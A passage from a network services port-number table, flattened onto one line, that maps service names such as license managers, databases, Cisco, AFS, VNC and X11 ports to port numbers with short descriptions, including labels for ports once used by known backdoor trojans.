Satellite-data Acquisition System 1 sas-1 1426/udp # Satellite-data Acquisition System 1 mloadd 1427/tcp # mloadd monitoring tool mloadd 1427/udp # mloadd monitoring tool informatik-lm 1428/tcp # Informatik License Manager informatik-lm 1428/udp # Informatik License Manager nms 1429/tcp # Hypercom NMS nms 1429/udp # Hypercom NMS tpdu 1430/tcp # Hypercom TPDU tpdu 1430/udp # Hypercom TPDU rgtp 1431/tcp # Reverse Gossip Transport rgtp 1431/udp # Reverse Gossip Transport blueberry-lm 1432/tcp # Blueberry Software License Manager blueberry-lm 1432/udp # Blueberry Software License Manager ms-sql-s 1433/tcp # Microsoft-SQL-Server ms-sql-s 1433/udp # Microsoft-SQL-Server ms-sql-m 1434/tcp # Microsoft-SQL-Monitor ms-sql-m 1434/udp # Microsoft-SQL-Monitor ibm-cics 1435/tcp # ibm-cics 1435/udp # sas-2 1436/tcp # Satellite-data Acquisition System 2 sas-2 1436/udp # Satellite-data Acquisition System 2 tabula 1437/tcp # tabula 1437/udp # eicon-server 1438/tcp # Eicon Security Agent/Server eicon-server 1438/udp # Eicon Security Agent/Server eicon-x25 1439/tcp # Eicon X25/SNA Gateway eicon-x25 1439/udp # Eicon X25/SNA Gateway eicon-slp 1440/tcp # Eicon Service Location Protocol eicon-slp 1440/udp # Eicon Service Location Protocol cadis-1 1441/tcp # Cadis License Management cadis-1 1441/udp # Cadis License Management cadis-2 1442/tcp # Cadis License Management cadis-2 1442/udp # Cadis License Management ies-lm 1443/tcp # Integrated Engineering Software ies-lm 1443/udp # Integrated Engineering Software marcam-lm 1444/tcp # Marcam License Management marcam-lm 1444/udp # Marcam License Management proxima-lm 1445/tcp # Proxima License Manager proxima-lm 1445/udp # Proxima License Manager ora-lm 1446/tcp # Optical Research Associates License Manager ora-lm 1446/udp # Optical Research Associates License Manager apri-lm 1447/tcp # Applied Parallel Research LM apri-lm 1447/udp # Applied Parallel Research LM oc-lm 1448/tcp # OpenConnect License Manager oc-lm 1448/udp # OpenConnect License Manager peport 1449/tcp # peport 1449/udp # dwf 1450/tcp # Tandem Distributed Workbench Facility dwf 1450/udp # Tandem Distributed Workbench Facility infoman 1451/tcp # IBM Information Management infoman 1451/udp # IBM Information Management gtegsc-lm 1452/tcp # GTE Government Systems License Man gtegsc-lm 1452/udp # GTE Government Systems License Man genie-lm 1453/tcp # Genie License Manager genie-lm 1453/udp # Genie License Manager interhdl_elmd 1454/tcp # interHDL License Manager interhdl_elmd 1454/udp # interHDL License Manager esl-lm 1455/tcp # ESL License Manager esl-lm 1455/udp # ESL License Manager dca 1456/tcp # dca 1456/udp # valisys-lm 1457/tcp # Valisys License Manager valisys-lm 1457/udp # Valisys License Manager nrcabq-lm 1458/tcp # Nichols Research Corp. nrcabq-lm 1458/udp # Nichols Research Corp. proshare1 1459/tcp # Proshare Notebook Application proshare1 1459/udp # Proshare Notebook Application proshare2 1460/tcp # Proshare Notebook Application proshare2 1460/udp # Proshare Notebook Application ibm_wrless_lan 1461/tcp # IBM Wireless LAN ibm_wrless_lan 1461/udp # IBM Wireless LAN world-lm 1462/tcp # World License Manager world-lm 1462/udp # World License Manager nucleus 1463/tcp # nucleus 1463/udp # msl_lmd 1464/tcp # MSL License Manager msl_lmd 1464/udp # MSL License Manager pipes 1465/tcp # Pipes Platform pipes 1465/udp # oceansoft-lm 1466/tcp # Ocean Software License Manager oceansoft-lm 1466/udp # Ocean Software License Manager csdmbase 1467/tcp # csdmbase 1467/udp # csdm 1468/tcp # csdm 1468/udp # aal-lm 1469/tcp # Active Analysis Limited License Manager aal-lm 1469/udp # Active Analysis Limited License Manager uaiact 1470/tcp # Universal Analytics uaiact 1470/udp # Universal Analytics csdmbase 1471/tcp # csdmbase 1471/udp # csdm 1472/tcp # csdm 1472/udp # openmath 1473/tcp # openmath 1473/udp # telefinder 1474/tcp # telefinder 1474/udp # taligent-lm 1475/tcp # Taligent License Manager taligent-lm 1475/udp # Taligent License Manager clvm-cfg 1476/tcp # clvm-cfg 1476/udp # ms-sna-server 1477/tcp # ms-sna-server 1477/udp # ms-sna-base 1478/tcp # ms-sna-base 1478/udp # dberegister 1479/tcp # dberegister 1479/udp # pacerforum 1480/tcp # pacerforum 1480/udp # airs 1481/tcp # airs 1481/udp # miteksys-lm 1482/tcp # Miteksys License Manager miteksys-lm 1482/udp # Miteksys License Manager afs 1483/tcp # AFS License Manager afs 1483/udp # AFS License Manager confluent 1484/tcp # Confluent License Manager confluent 1484/udp # Confluent License Manager lansource 1485/tcp # lansource 1485/udp # nms_topo_serv 1486/tcp # nms_topo_serv 1486/udp # localinfosrvr 1487/tcp # localinfosrvr 1487/udp # docstor 1488/tcp # docstor 1488/udp # dmdocbroker 1489/tcp # dmdocbroker 1489/udp # insitu-conf 1490/tcp # insitu-conf 1490/udp # anynetgateway 1491/tcp # anynetgateway 1491/udp # stone-design-1 1492/tcp # stone-design-1 1492/udp # netmap_lm 1493/tcp # netmap_lm 1493/udp # citrix-ica 1494/tcp # citrix-ica 1494/udp # cvc 1495/tcp # cvc 1495/udp # liberty-lm 1496/tcp # liberty-lm 1496/udp # rfx-lm 1497/tcp # rfx-lm 1497/udp # watcom-sql 1498/tcp # watcom-sql 1498/udp # fhc 1499/tcp # Federico Heinz Consultora fhc 1499/udp # Federico Heinz Consultora vlsi-lm 1500/tcp # VLSI License Manager vlsi-lm 1500/udp # VLSI License Manager sas-3 1501/tcp # Satellite-data Acquisition System 3 sas-3 1501/udp # Satellite-data Acquisition System 3 shivadiscovery 1502/tcp # Shiva shivadiscovery 1502/udp # Shiva imtc-mcs 1503/tcp # Databeam imtc-mcs 1503/udp # Databeam evb-elm 1504/tcp # EVB Software Engineering License Manager evb-elm 1504/udp # EVB Software Engineering License Manager funkproxy 1505/tcp # Funk Software, Inc. funkproxy 1505/udp # Funk Software, Inc. utcd 1506/tcp # Universal Time daemon (utcd) utcd 1506/udp # Universal Time daemon (utcd) symplex 1507/tcp # symplex 1507/udp # diagmond 1508/tcp # diagmond 1508/udp # robcad-lm 1509/tcp # Robcad, Ltd. License Manager robcad-lm 1509/udp # Robcad, Ltd. License Manager mvx-lm 1510/tcp # Midland Valley Exploration Ltd. Lic. Man. mvx-lm 1510/udp # Midland Valley Exploration Ltd. Lic. Man. 3l-l1 1511/tcp # 3l-l1 1511/udp # wins 1512/tcp # Microsoft's Windows Internet Name Service wins 1512/udp # Microsoft's Windows Internet Name Service fujitsu-dtc 1513/tcp # Fujitsu Systems Business of America, Inc fujitsu-dtc 1513/udp # Fujitsu Systems Business of America, Inc fujitsu-dtcns 1514/tcp # Fujitsu Systems Business of America, Inc fujitsu-dtcns 1514/udp # Fujitsu Systems Business of America, Inc ifor-protocol 1515/tcp # ifor-protocol 1515/udp # vpad 1516/tcp # Virtual Places Audio data vpad 1516/udp # Virtual Places Audio data vpac 1517/tcp # Virtual Places Audio control vpac 1517/udp # Virtual Places Audio control vpvd 1518/tcp # Virtual Places Video data vpvd 1518/udp # Virtual Places Video data vpvc 1519/tcp # Virtual Places Video control vpvc 1519/udp # Virtual Places Video control atm-zip-office 1520/tcp # atm zip office atm-zip-office 1520/udp # atm zip office oracle 1521/tcp # Oracle Database ncube-lm 1521/udp # nCube License Manager rna-lm 1522/tcp # Ricardo North America License Manager rna-lm 1522/udp # Ricardo North America License Manager cichild-lm 1523/tcp # cichild-lm 1523/udp # ingreslock 1524/tcp # ingres ingreslock 1524/udp # ingres orasrv 1525/tcp # oracle or Prospero Directory Service non-priv orasrv 1525/udp # oracle pdap-np 1526/tcp # Prospero Data Access Prot non-priv pdap-np 1526/udp # Prospero Data Access Prot non-priv tlisrv 1527/tcp # oracle tlisrv 1527/udp # oracle mciautoreg 1528/tcp # mciautoreg 1528/udp # support 1529/tcp # prmsd gnatsd # cygnus bug tracker coauthor 1529/udp # oracle rap-service 1530/tcp # rap-service 1530/udp # rap-listen 1531/tcp # rap-listen 1531/udp # miroconnect 1532/tcp # miroconnect 1532/udp # virtual-places 1533/tcp # Virtual Places Software virtual-places 1533/udp # Virtual Places Software micromuse-lm 1534/tcp # micromuse-lm 1534/udp # ampr-info 1535/tcp # ampr-info 1535/udp # ampr-inter 1536/tcp # ampr-inter 1536/udp # sdsc-lm 1537/tcp # sdsc-lm 1537/udp # 3ds-lm 1538/tcp # 3ds-lm 1538/udp # intellistor-lm 1539/tcp # Intellistor License Manager intellistor-lm 1539/udp # Intellistor License Manager rds 1540/tcp # rds 1540/udp # rds2 1541/tcp # rds2 1541/udp # gridgen-elmd 1542/tcp # gridgen-elmd 1542/udp # simba-cs 1543/tcp # simba-cs 1543/udp # aspeclmd 1544/tcp # aspeclmd 1544/udp # vistium-share 1545/tcp # vistium-share 1545/udp # abbaccuray 1546/tcp # abbaccuray 1546/udp # laplink 1547/tcp # laplink 1547/udp # axon-lm 1548/tcp # Axon License Manager axon-lm 1548/udp # Axon License Manager shivahose 1549/tcp # Shiva Hose shivasound 1549/udp # Shiva Sound 3m-image-lm 1550/tcp # Image Storage license manager 3M Company 3m-image-lm 1550/udp # Image Storage license manager 3M Company hecmtl-db 1551/tcp # hecmtl-db 1551/udp # pciarray 1552/tcp # pciarray 1552/udp # issd 1600/tcp # issd 1600/udp # radius 1645/udp # radius authentication radacct 1646/udp # radius accounting nkd 1650/tcp # nkd 1650/udp # shiva_confsrvr 1651/tcp # shiva_confsrvr 1651/udp # xnmp 1652/tcp # xnmp 1652/udp # netview-aix-1 1661/tcp # netview-aix-1 1661/udp # netview-aix-2 1662/tcp # netview-aix-2 1662/udp # netview-aix-3 1663/tcp # netview-aix-3 1663/udp # netview-aix-4 1664/tcp # netview-aix-4 1664/udp # netview-aix-5 1665/tcp # netview-aix-5 1665/udp # netview-aix-6 1666/tcp # netview-aix-6 1666/udp # netview-aix-7 1667/tcp # netview-aix-7 1667/udp # netview-aix-8 1668/tcp # netview-aix-8 1668/udp # netview-aix-9 1669/tcp # netview-aix-9 1669/udp # netview-aix-10 1670/tcp # netview-aix-10 1670/udp # netview-aix-11 1671/tcp # netview-aix-11 1671/udp # netview-aix-12 1672/tcp # netview-aix-12 1672/udp # CarbonCopy 1680/tcp # L2TP 1701/udp # H.323/Q.931 1720/tcp # Interactive media pptp 1723/tcp # Point-to-point tunnelling protocol wms 1755/tcp # Windows media service radius 1812/udp # RADIUS authentication protocol (RFC 2138) radacct 1813/udp # RADIUS accounting protocol (RFC 2139) pcm 1827/tcp # PCM Agent (AutoSecure Policy Compliance Manager UPnP 1900/tcp # Universal PnP UPnP 1900/udp # Universal PnP bigbrother 1984/tcp # Big Brother monitoring server - www.bb4.com licensedaemon 1986/tcp # cisco license management licensedaemon 1986/udp # cisco license management tr-rsrb-p1 1987/tcp # cisco RSRB Priority 1 port tr-rsrb-p1 1987/udp # cisco RSRB Priority 1 port tr-rsrb-p2 1988/tcp # cisco RSRB Priority 2 port tr-rsrb-p2 1988/udp # cisco RSRB Priority 2 port tr-rsrb-p3 1989/tcp # cisco RSRB Priority 3 port tr-rsrb-p3 1989/udp # cisco RSRB Priority 3 port stun-p1 1990/tcp # cisco STUN Priority 1 port stun-p1 1990/udp # cisco STUN Priority 1 port stun-p2 1991/tcp # cisco STUN Priority 2 port stun-p2 1991/udp # cisco STUN Priority 2 port stun-p3 1992/tcp # cisco STUN Priority 3 port stun-p3 1992/udp # cisco STUN Priority 3 port snmp-tcp-port 1993/tcp # cisco SNMP TCP port snmp-tcp-port 1993/udp # cisco SNMP TCP port stun-port 1994/tcp # cisco serial tunnel port stun-port 1994/udp # cisco serial tunnel port perf-port 1995/tcp # cisco perf port perf-port 1995/udp # cisco perf port tr-rsrb-port 1996/tcp # cisco Remote SRB port tr-rsrb-port 1996/udp # cisco Remote SRB port gdp-port 1997/tcp # cisco Gateway Discovery Protocol gdp-port 1997/udp # cisco Gateway Discovery Protocol x25-svc-port 1998/tcp # cisco X.25 service (XOT) x25-svc-port 1998/udp # cisco X.25 service (XOT) tcp-id-port 1999/tcp # cisco identification port tcp-id-port 1999/udp # cisco identification port callbook 2000/tcp # callbook 2000/udp # dc 2001/tcp # or nfr20 web queries wizard 2001/udp # curry globe 2002/tcp # globe 2002/udp # cfingerd 2003/tcp # GNU finger mailbox 2004/tcp # emce 2004/udp # CCWS mm conf deslogin 2005/tcp # encrypted symmetric telnet/login oracle 2005/udp # invokator 2006/tcp # raid-cc 2006/udp # raid dectalk 2007/tcp # raid-am 2007/udp # conf 2008/tcp # terminaldb 2008/udp # news 2009/tcp # whosockami 2009/udp # search 2010/tcp # Or nfr411 pipe_server 2010/udp # Also used by NFR raid-cc 2011/tcp # raid servserv 2011/udp # ttyinfo 2012/tcp # raid-ac 2012/udp # raid-am 2013/tcp # raid-cd 2013/udp # troff 2014/tcp # raid-sf 2014/udp # cypress 2015/tcp # raid-cs 2015/udp # bootserver 2016/tcp # bootserver 2016/udp # cypress-stat 2017/tcp # bootclient 2017/udp # terminaldb 2018/tcp # rellpack 2018/udp # whosockami 2019/tcp # about 2019/udp # xinupageserver 2020/tcp # xinupageserver 2020/udp # servexec 2021/tcp # xinuexpansion1 2021/udp # down 2022/tcp # xinuexpansion2 2022/udp # xinuexpansion3 2023/tcp # xinuexpansion3 2023/udp # xinuexpansion4 2024/tcp # xinuexpansion4 2024/udp # ellpack 2025/tcp # xribs 2025/udp # scrabble 2026/tcp # scrabble 2026/udp # shadowserver 2027/tcp # shadowserver 2027/udp # submitserver 2028/tcp # submitserver 2028/udp # device2 2030/tcp # device2 2030/udp # blackboard 2032/tcp # blackboard 2032/udp # glogger 2033/tcp # glogger 2033/udp # scoremgr 2034/tcp # scoremgr 2034/udp # imsldoc 2035/tcp # imsldoc 2035/udp # objectmanager 2038/tcp # objectmanager 2038/udp # lam 2040/tcp # lam 2040/udp # interbase 2041/tcp # interbase 2041/udp # isis 2042/tcp # isis 2042/udp # isis-bcast 2043/tcp # isis-bcast 2043/udp # rimsl 2044/tcp # rimsl 2044/udp # cdfunc 2045/tcp # cdfunc 2045/udp # sdfunc 2046/tcp # sdfunc 2046/udp # dls 2047/tcp # dls 2047/udp # dls-monitor 2048/tcp # dls-monitor 2048/udp # nfs 2049/tcp # networked file system nfs 2049/udp # networked file system dnet-keyproxy 2064/tcp # A closed-source client for solving the RSA cryptographic challenge. This is the keyblock proxy port. knetd 2053/tcp # dlsrpn 2065/tcp # Data Link Switch Read Port Number dlsrpn 2065/udp # Data Link Switch Read Port Number dlswpn 2067/tcp # Data Link Switch Write Port Number dlswpn 2067/udp # Data Link Switch Write Port Number advocentkvm 2068/tcp # Advocent KVM Server zephyr-clt 2103/udp # Zephyr serv-hm connection zephyr-hm 2104/udp # Zephyr hostmanager eklogin 2105/tcp # Kerberos (v4) encrypted rlogin eklogin 2105/udp # Kerberos (v4) encrypted rlogin ekshell 2106/tcp # Kerberos (v4) encrypted rshell ekshell 2106/udp # Kerberos (v4) encrypted rshell rkinit 2108/tcp # Kerberos (v4) remote initialization rkinit 2108/udp # Kerberos (v4) remote initialization kx 2111/tcp # X over kerberos kip 2112/tcp # IP over kerberos kauth 2120/tcp # Remote kauth ats 2201/tcp # Advanced Training System Program ats 2201/udp # Advanced Training System Program ivs-video 2232/tcp # IVS Video default ivs-video 2232/udp # IVS Video default ivsd 2241/tcp # IVS Daemon ivsd 2241/udp # IVS Daemon compaqdiag 2301/tcp # Compaq remote diagnostic/management pehelp 2307/tcp # pehelp 2307/udp # cvspserver 2401/tcp # CVS network server cvspserver 2401/udp # CVS network server venus 2430/tcp # venus 2430/udp # venus-se 2431/tcp # venus-se 2431/udp # codasrv 2432/tcp # codasrv 2432/udp # codasrv-se 2433/tcp # codasrv-se 2433/udp # rtsserv 2500/tcp # Resource Tracking system server rtsserv 2500/udp # Resource Tracking system server rtsclient 2501/tcp # Resource Tracking system client rtsclient 2501/udp # Resource Tracking system client hp-3000-telnet 2564/tcp # HP 3000 NS/VT block mode telnet zebrasrv 2600/tcp # zebra service zebra 2601/tcp # zebra vty ripd 2602/tcp # RIPd vty ripngd 2603/tcp # RIPngd vty ospfd 2604/tcp # OSPFd vty bgpd 2605/tcp # BGPd vty webster 2627/tcp # Network dictionary webster 2627/udp # sybase 2638/tcp # Sybase database listen 2766/tcp # System V listener port www-dev 2784/tcp # world wide web - development www-dev 2784/udp # world wide web - development extensisportfolio 2903/tcp # Portfolio Server by Extensis Product Group iss-realsec 2998/tcp # ISS RealSecure IDS Remote Console Admin port ppp 3000/tcp # User-level ppp daemon, or chili!soft asp nessusd 3001/tcp # Nessus Security Scanner (www.nessus.org) Daemon or chili!soft asp deslogin 3005/tcp # encrypted symmetric telnet/login deslogind 3006/tcp # cfs 3049/tcp # cryptographic file system (nfs) (proposed) cfs 3049/udp # cryptographic file system (nfs) PowerChute 3052/tcp dnet-tstproxy 3064/tcp # distributed.net (a closed source crypto-cracking project) proxy test port sj3 3086/tcp # SJ3 (kanji input) squid-http 3128/tcp # squid-ipc 3130/udp # vmodem 3141/tcp # vmodem 3141/udp # ccmail 3264/tcp # cc:mail/lotus ccmail 3264/udp # cc:mail/lotus globalcatLDAP 3268/tcp # Global Catalog LDAP globalcatLDAPssl 3269/tcp # Global Catalog LDAP over ssl meetingmaker 3292/tcp # Meeting maker time management software mysql 3306/tcp # mySQL dec-notes 3333/tcp # DEC Notes dec-notes 3333/udp # DEC Notes msdtc 3372/tcp # MS distributed transaction coordinator ms-term-serv 3389/tcp # Microsoft Remote Display Protocol squid-snmp 3401/udp # Squid proxy SNMP port bmap 3421/tcp # Bull Apprise portmapper bmap 3421/udp # Bull Apprise portmapper prsvp 3455/tcp # RSVP Port prsvp 3455/udp # RSVP Port vat 3456/tcp # VAT default data IISrpc-or-vat 3456/udp # also VAT default data vat-control 3457/tcp # VAT default control vat-control 3457/udp # VAT default control track 3462/tcp # software distribution udt_os 3900/tcp # Unidata UDT OS udt_os 3900/udp # Unidata UDT OS mapper-nodemgr 3984/tcp # MAPPER network node manager mapper-nodemgr 3984/udp # MAPPER network node manager mapper-mapethd 3985/tcp # MAPPER TCP/IP server mapper-mapethd 3985/udp # MAPPER TCP/IP server mapper-ws_ethd 3986/tcp # MAPPER workstation server mapper-ws_ethd 3986/udp # MAPPER workstation server remoteanything 3996/udp # neoworx remote-anything slave daemon remoteanything 3997/udp # neoworx remote-anything master daemon remoteanything 3998/udp # neoworx remote-anything reserved remoteanything 3999/tcp # neoworx remote-anything slave file browser remoteanything 4000/tcp # neoworx remote-anything slave remote control icq 4000/udp # AOL ICQ instant messaging clent-server communication netcheque 4008/tcp # NetCheque accounting netcheque 4008/udp # NetCheque accounting lockd 4045/tcp # lockd 4045/udp # NFS lock daemon/manager nuts_dem 4132/tcp # NUTS Daemon nuts_dem 4132/udp # NUTS Daemon nuts_bootp 4133/tcp # NUTS Bootp Server nuts_bootp 4133/udp # NUTS Bootp Server wincim 4144/tcp # pc windows compuserve.com protocol rwhois 4321/tcp # Remote Who Is rwhois 4321/udp # Remote Who Is msql 4333/tcp # mini-sql server unicall 4343/tcp # unicall 4343/udp # krb524 4444/tcp # Kerberos 5 to 4 ticket xlator krb524 4444/udp # proxy-plus 4480/tcp # Proxy+ HTTP proxy port sae-urn 4500/tcp # sae-urn 4500/udp # fax 4557/tcp # FlexFax FAX transmission service hylafax 4559/tcp # HylaFAX client-server protocol rfa 4672/tcp # remote file access server rfa 4672/udp # remote file access server squid-htcp 4827/udp # Squid proxy HTCP port radmin 4899/tcp # Radmin (www.radmin.com) remote PC control software maybeveritas 4987/tcp # maybeveritas 4998/tcp # UPnP 5000/tcp # Universal PnP, also Free Internet Chess Server UPnP 5000/udp # also complex-main commplex-link 5001/tcp # commplex-link 5001/udp # rfe 5002/tcp # Radio Free Ethernet rfe 5002/udp # Radio Free Ethernet filemaker 5003/tcp # Filemaker Server - http://www.filemaker.com/ti/104289.html filemaker 5003/udp # Filemaker Server - http://www.filemaker.com/ti/104289.html telelpathstart 5010/tcp # telelpathstart 5010/udp # telelpathattack 5011/tcp # telelpathattack 5011/udp # yahoo_msg 5050/tcp # yahoo messenger yahoo_msg 5050/udp # yahoo messenger admd 5100/tcp # (chili!soft asp admin port) admdog 5101/tcp # (chili!soft asp) admeng 5102/tcp # (chili!soft asp) rmonitor_secure 5145/tcp # rmonitor_secure 5145/udp # aol 5190/tcp # America-Online. Also can be used by ICQ aol 5190/udp # America-Online. aol-1 5191/tcp # AmericaOnline1 aol-1 5191/udp # AmericaOnline1 aol-2 5192/tcp # AmericaOnline2 aol-2 5192/udp # AmericaOnline2 aol-3 5193/tcp # AmericaOnline3 aol-3 5193/udp # AmericaOnline3 sgi-dgl 5232/tcp # SGI Distributed Graphics padl2sim 5236/tcp # padl2sim 5236/udp # hacl-hb 5300/tcp # HA cluster heartbeat hacl-hb 5300/udp # HA cluster heartbeat hacl-gs 5301/tcp # HA cluster general services hacl-gs 5301/udp # HA cluster general services hacl-cfg 5302/tcp # HA cluster configuration hacl-cfg 5302/udp # HA cluster configuration hacl-probe 5303/tcp # HA cluster probing hacl-probe 5303/udp # HA cluster probing hacl-local 5304/tcp # hacl-local 5304/udp # hacl-test 5305/tcp # hacl-test 5305/udp # cfengine 5308/tcp # cfengine 5308/udp # pcduo-old 5400/tcp # RemCon PC-Duo - old port pcduo 5405/tcp # RemCon PC-Duo - new port connect-proxy 5490/tcp # Many HTTP CONNECT proxies postgres 5432/tcp # postgres database server securid 5500/udp # SecurID secureidprop 5510/tcp # ACE/Server services sdlog 5520/tcp # ACE/Server services sdserv 5530/tcp # ACE/Server services sdreport 5540/tcp # ACE/Server services sdxauthd 5540/udp # ACE/Server services sdadmind 5550/tcp # ACE/Server services freeciv 5555/tcp # rplay 5555/udp # pcanywheredata 5631/tcp # pcanywherestat 5632/tcp # pcanywherestat 5632/udp # canna 5680/tcp # Canna (Japanese Input) proshareaudio 5713/tcp # proshare conf audio proshareaudio 5713/udp # proshare conf audio prosharevideo 5714/tcp # proshare conf video prosharevideo 5714/udp # proshare conf video prosharedata 5715/tcp # proshare conf data prosharedata 5715/udp # proshare conf data prosharerequest 5716/tcp # proshare conf request prosharerequest 5716/udp # proshare conf request prosharenotify 5717/tcp # proshare conf notify prosharenotify 5717/udp # proshare conf notify vnc-http 5800/tcp # Virtual Network Computer HTTP Access, display 0 vnc-http-1 5801/tcp # Virtual Network Computer HTTP Access, display 1 vnc-http-2 5802/tcp # Virtual Network Computer HTTP Access, display 2 vnc-http-3 5803/tcp # Virtual Network Computer HTTP Access, display 3 vnc 5900/tcp # Virtual Network Computer display 0 vnc-1 5901/tcp # Virtual Network Computer display 1 vnc-2 5902/tcp # Virtual Network Computer display 2 vnc-3 5903/tcp # Virtual Network Computer display 3 ncd-pref-tcp 5977/tcp # NCD preferences tcp port ncd-diag-tcp 5978/tcp # NCD diagnostic tcp port ncd-conf-tcp 5979/tcp # NCD configuration tcp port ncd-pref 5997/tcp # NCD preferences telnet port ncd-diag 5998/tcp # NCD diagnostic telnet port ncd-conf 5999/tcp # NCD configuration telnet port X11 6000/tcp # X Window server X11:1 6001/tcp # X Window server X11:2 6002/tcp # X Window server X11:3 6003/tcp # X Window server X11:4 6004/tcp # X Window server X11:5 6005/tcp # X Window server X11:6 6006/tcp # X Window server X11:7 6007/tcp # X Window server X11:8 6008/tcp # X Window server X11:9 6009/tcp # X Window server arcserve 6050/tcp # ARCserve agent VeritasBackupExec 6101/tcp # Backup Exec UNIX and 95/98/ME Aent RETS-or-BackupExec 6103/tcp # Backup Exec Agent Accelerator and Remote Agent also sql server and cisco works blue isdninfo 6105/tcp # isdninfo isdninfo 6106/tcp # i4lmond softcm 6110/tcp # HP SoftBench CM softcm 6110/udp # HP SoftBench CM spc 6111/tcp # HP SoftBench Sub-Process Control spc 6111/udp # HP SoftBench Sub-Process Control dtspc 6112/tcp # CDE subprocess control meta-corp 6141/tcp # Meta Corporation License Manager meta-corp 6141/udp # Meta Corporation License Manager aspentec-lm 6142/tcp # Aspen Technology License Manager aspentec-lm 6142/udp # Aspen Technology License Manager watershed-lm 6143/tcp # Watershed License Manager watershed-lm 6143/udp # Watershed License Manager statsci1-lm 6144/tcp # StatSci License Manager - 1 statsci1-lm 6144/udp # StatSci License Manager - 1 statsci2-lm 6145/tcp # StatSci License Manager - 2 statsci2-lm 6145/udp # StatSci License Manager - 2 lonewolf-lm 6146/tcp # Lone Wolf Systems License Manager lonewolf-lm 6146/udp # Lone Wolf Systems License Manager montage-lm 6147/tcp # Montage License Manager montage-lm 6147/udp # Montage License Manager ricardo-lm 6148/tcp # Ricardo North America License Manager ricardo-lm 6148/udp # Ricardo North America License Manager gnutella 6346/tcp # Gnutella file sharing protocol crystalreports 6400/tcp # Seagate Crystal Reports crystalenterprise 6401/tcp # Seagate Crystal Enterprise PowerChutePLUS 6547/tcp # PowerChutePLUS 6548/tcp # PowerChutePLUS 6549/udp # netop-rc 6502/tcp # NetOp Remote Control (by Danware Data A/S) netop-rc 6502/udp # NetOp Remote Control (by Danware Data A/S) xdsxdm 6558/tcp # xdsxdm 6558/udp # analogx 6588/tcp # AnalogX HTTP proxy port irc-serv 6666/tcp # internet relay chat server irc 6667/tcp # Internet Relay Chat irc 6668/tcp # Internet Relay Chat acmsoda 6969/tcp # acmsoda 6969/udp # afs3-fileserver 7000/tcp # file server itself, msdos afs3-fileserver 7000/udp # file server itself afs3-callback 7001/tcp # callbacks to cache managers afs3-callback 7001/udp # callbacks to cache managers afs3-prserver 7002/tcp # users & groups database afs3-prserver 7002/udp # users & groups database afs3-vlserver 7003/tcp # volume location database afs3-vlserver 7003/udp # volume location database afs3-kaserver 7004/tcp # AFS/Kerberos authentication service afs3-kaserver 7004/udp # AFS/Kerberos authentication service afs3-volser 7005/tcp # volume managment server afs3-volser 7005/udp # volume managment server afs3-errors 7006/tcp # error interpretation service afs3-errors 7006/udp # error interpretation service afs3-bos 7007/tcp # basic overseer process afs3-bos 7007/udp # basic overseer process afs3-update 7008/tcp # server-to-server updater afs3-update 7008/udp # server-to-server updater afs3-rmtsys 7009/tcp # remote cache manager service afs3-rmtsys 7009/udp # remote cache manager service ups-onlinet 7010/tcp # onlinet uninterruptable power supplies ups-onlinet 7010/udp # onlinet uninterruptable power supplies realserver 7070/tcp font-service 7100/tcp # X Font Service font-service 7100/udp # X Font Service fodms 7200/tcp # FODMS FLIP fodms 7200/udp # FODMS FLIP dlip 7201/tcp # dlip 7201/udp # openmanage 7273/tcp # Dell OpenManage icb 7326/tcp # Internet Citizen's Band qaz 7597/tcp # Quaz trojan worm cucme-1 7648/udp # cucme live video/audio server cucme-2 7649/udp # cucme live video/audio server cucme-3 7650/udp # cucme live video/audio server cucme-4 7651/udp # cucme live video/audio server http-alt 8000/tcp # A common alternative http port ajp12 8007/tcp # Apache JServ Protocol 1.x ajp13 8009/tcp # Apache JServ Protocol 1.3 http-proxy 8080/tcp # Common HTTP proxy/second web server port blackice-icecap 8081/tcp # ICECap user console blackice-alerts 8082/tcp # BlackIce Alerts sent to this port https-alt 8443/tcp # Common alternative https port sun-answerbook 8888/tcp # Sun Answerbook HTTP server seosload 8892/tcp # From the new Computer Associates eTrust ACX zeus-admin 9090/tcp # Zeus admin server jetdirect 9100/tcp # HP JetDirect card DragonIDSConsole 9111/tcp # Dragon IDS Console ms-sql2000 9152/tcp # man 9535/tcp # man 9535/udp # sd 9876/tcp # Session Director sd 9876/udp # Session Director issa 9991/tcp # ISS System Scanner Agent issc 9992/tcp # ISS System Scanner Console abyss 9999/tcp # Abyss web server remote web management interface snet-sensor-mgmt 10000/tcp # SecureNet Pro Sensor https management server stel 10005/tcp # Secure telnet amanda 10080/udp # Amanda Backup Util amandaidx 10082/tcp # Amanda indexing amidxtape 10083/tcp # Amanda tape indexing pksd 11371/tcp # PGP Public Key Server cce4x 12000/tcp # ClearCommerce Engine 4.x (www.clearcommerce.com) NetBus 12345/tcp # NetBus backdoor trojan or Trend Micro Office Scan NetBus 12346/tcp # NetBus backdoor trojan VeritasNetbackup 13701/tcp # vmd server VeritasNetbackup 13702/tcp # ascd server VeritasNetbackup 13705/tcp # tl8cd server VeritasNetbackup 13706/tcp # odld server VeritasNetbackup 13708/tcp # vtlcd server VeritasNetbackup 13709/tcp # ts8d server VeritasNetbackup 13710/tcp # tc8d server VeritasNetbackup 13711/tcp # server VeritasNetbackup 13712/tcp # tc4d server VeritasNetbackup 13713/tcp # tl4d server VeritasNetbackup 13714/tcp # tsdd server VeritasNetbackup 13715/tcp # tshd server VeritasNetbackup 13716/tcp # tlmd server VeritasNetbackup 13717/tcp # tlhcd server VeritasNetbackup 13718/tcp # lmfcd server VeritasNetbackup 13720/tcp # bprd server VeritasNetbackup 13721/tcp # bpdbm server VeritasNetbackup 13722/tcp # bpjava-msvc client VeritasNetbackup 13782/tcp # bpcd client VeritasNetbackup 13783/tcp # vopied client swgps 15126/tcp # Nortel Java S/WGPS Global Payment Solutions for US credit card authorizations subseven 16959/tcp # Subseven trojan isode-dua 17007/tcp # isode-dua 17007/udp # wdbrpc 17185/udp # vxWorks WDB remote debugging ONCRPC kuang2 17300/tcp # Kuang2 backdoor biimenu 18000/tcp # Beckman Instruments, Inc. biimenu 18000/udp # Beckman Instruments, Inc. opsec_cvp 18181/tcp # Check Point OPSEC opsec_ufp 18182/tcp # Check Point OPSEC opsec_sam 18183/tcp # Check Point OPSEC opsec_lea 18184/tcp # Check Point OPSEC opsec_omi 18185/tcp # Check Point OPSEC opsec_ela 18187/tcp # Check Point OPSEC btx 20005/tcp # xcept4 (Interacts with German Telekom's CEPT videotext service) wnn6 22273/tcp # Wnn6 (Japanese input) wnn6_Cn 22289/tcp # Wnn6 (Chinese input) wnn6_Kr 22305/tcp # Wnn6 (Korean input) wnn6_Tw 22321/tcp # Wnn6 (Taiwanse input) 